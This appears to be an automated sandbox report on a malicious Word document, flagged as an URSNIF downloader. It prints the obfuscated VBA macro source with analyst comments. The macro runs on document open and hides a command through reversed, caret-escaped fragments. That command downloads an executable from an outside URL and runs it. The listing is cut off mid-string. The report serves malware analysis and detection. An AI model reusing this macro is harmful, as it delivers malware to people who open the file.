Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates use of the Shell() function, which is most likely invoked from the 'Document_open' macro to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' is consistent with this downloader behaviour. The embedded URL 'http://schemas.openxmlformats.org/drawingml/2006/main' was confirmed benign: it matches the standard DrawingML XML namespace URI, so it is most likely part of the document structure rather than a network indicator.
Heuristics (5)
- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4951 bytes | 1163b3d0006f1f9be5d9c1261fe932c5be7fe6ff46f173df2a46393486475479 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "UCDiRpWFPmBlbz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executes when the document is opened (OLE_VBA_DOCOPEN).
Private Sub Document_open()
' "On Error Resume Next" split across line continuations (_) so the
' statement does not appear as a single string; it suppresses runtime errors.
On _
Error _
Resume _
Next
' VarType calls on concatenated literals are no-op junk statements that pad
' the macro and dilute signature matches; they have no effect on behaviour.
VarType "9795" + "hK"
VarType "iMwAUzCR" + "124164705"
VarType "453346350" + "N" + "Q" + "4131"
' The Shell() argument is assembled at runtime from two functions so no
' single literal holds the command; vbHide (0) runs it in a hidden window.
Shell fUwqmrdF + nquuwpidPRr, Format(vbHide)
VarType "ajJz" + "OUWHUC"
VarType "jHK" + "1645" + "aXbd" + "urLtswE"
End Sub
Attribute VB_Name = "lYWHbkt"
Function fUwqmrdF()
On _
Error _
Resume _
Next
VarType "r" + "6468"
VarType "8554" + "309009182"
' Arithmetic hides the character codes: 12+4+0+7+76 = 99 ("c"),
' 8+2+0+5+52 = 67 ("C"), 3+1+0+2+28 = 34 (double quote). The result is a
' cmd.exe command line whose text is split into fragments and obfuscated
' with caret (^) escape characters.
qniUmPdIUS = Format(Chr(12 + 4 + 0 + 7 + 76)) + "m" + "d " + "/V" + "/" + Format(Chr(8 + 2 + 0 + 5 + 52)) + Format(Chr(3 + 1 + 0 + 2 + 28)) + "s^e^" + "t y^i" + "^" + "p= ^ " + "^ ^ ^" + " " + " ^ ^"
VarType "A" + "KdzIjVa" + "L" + "ziw"
VarType "2755" + "6731" + "6367" + "QRwiiwpQr"
VarType "VarwSQTvQ" + "356158450" + "ZDt" + "2824"
wzjIK = " " + " ^" + " ^ ^}^}" + "{^h" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "ta" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "}^;" + "^ka^erb" + ";jr" + "^E$^" + " me^tI-" + "ekovn^I"
VarType "YXpEQ" + "GDUNRNun"
VarType "1607" + "TS" + "160521667" + "235791919"
VarType "rq" + "irkf"
VarType "5849" + "MIASGi" + "OiHz" + "QDruGi"
YwivHGpw = ";)^jr^" + "E" + "$^" + " ^,jH" + "^A$(e"
VarType "491799933" + "XXz"
VarType "sYM" + "1537" + "201128571" + "zzr"
VarType "Wjj" + "bqoJiw"
VarType "NWu" + "AzDV" + "8342" + "YRBM"
VarType "206998428" + "6523" + "NpBYlz" + "FWFlKsQjjRD"
OYpWi = "l^" + "i" + "^" + "F^da^ol" + "nwo" + "^D." + Format(Chr(8 + 2 + 0 + 5 + 52)) + "N^q^$" + "^{^y" + "rt{)h" + "tj^$^ " + "ni" + " ^j^H^"
VarType "AszS" + "Idji"
VarType "T" + "3109"
VarType "nAj" + "caO"
TpFMm = "A^$(^h" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "a^er" + "^o" + "f;" + "'e" + "^xe.^'^" + "+^J^Xr^" + "$+^'^" + "\" + "'+" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "^i^" + "l^bup^:" + "vn^e$=^"
' The fragments are concatenated only here, at return time.
fUwqmrdF = qniUmPdIUS + wzjIK + YwivHGpw + OYpWi + TpFMm
VarType "LbaaCfCFQAQoc" + "vF" + "olI" + "67950561"
VarType "6252" + "134911265"
VarType "9339" + "T"
VarType "vOJ" + "o" + "462999029" + "4770"
End Function
Function nquuwpidPRr()
On _
Error _
Resume _
Next
VarType "141138532" + "427439284"
VarType "376656094" + "516740597" + "RPtrcTtQ" + "XFwUhp"
VarType "wff" + "D"
nLdddl = "jrE$^;^" + "'" + "2^65^'" + " ^" + "=^ J^X" + "r$^" + ";" + ")" + "^'@^'"
VarType "4591" + "c" + "saQW" + "GO"
VarType "XILOzpBP" + "118359393" + "4105" + "CzkUGfqoVOwGr"
VarType "fLscOdvaTIwWs" + "IwTsz" + "506876850" + "385060028"
VarType "28348501" + "91404210"
ASzCUlSj = "(" + "^t^" + "i" + "l^p^S^" + ".^'nk" + "^t^.4" + "agr" + "at^=" + "^" + "l^?"
VarType "TU" + "kDtBdqhsA"
VarType "YTkfkkAtVf" + "388465826" + "HY" + "89432268"
VarType "266393549" + "CzHW"
VarType "DHZiuRz" + "185781960" + "500302257" + "vmu"
QvCuAZl = "^ph^p" + "^.^t" + "^o" + "^ksn^" + "apo/^T" + "TR/mo" + Format(Chr(12 + 4 + 0 + 7 + 76)) + ".^zwuz" + "^w8o" + "^9" + "dv" + "^454v//" + ":ptt" + "^h'^"
VarType "aHbi" + "424609821"
VarType "Y" + "163881480"
iRitfibjI = "=h" + "t" + "j" + "^$;" + "tne^i^" + "l" + Format(Chr(8 + 2 + 0 + 5 + 52)) + "^"
VarType "Lp" + "6348"
VarType "395543271" + "8456" + "25305375" + "504431308"
VarType "jEZwTTw" + "Eqna" + "1229" + "Si"
VarType "Pnz" + "ZjQ"
TtdrbIdzH = "b^eW." + "^t" + "eN^ t" + Format(Chr(12 + 4 + 0 + 7 + 76)) + "^" + "ej" + "b^o-w" + "en^"
VarType "260935029" + "162052099" + "nwpsAo" + "qZPuS"
VarType "103603013" + "YspBXX" + "wTplBmtPEi" + "wuj"
VarType "233202158" + "6336"
ssIjdE = "=" + Format(Chr(8 + 2 + 0 + 5 + 52)) + "Nq$" + "^ ^l^" + "le^" + "hsre"
VarType "AAobUhTwq" + "AGzBiaVhJ"
VarType "8069" + "4951" + "506410857" + "z"
VarType "194169166" + "ZX" + "CQ" + "V"
uSBOJpHrz = "w^" + "o^p&&^f" + "^or" + " /" + "^L " + "%^u ^i" + "n (2" + "6^5^,^
... (truncated)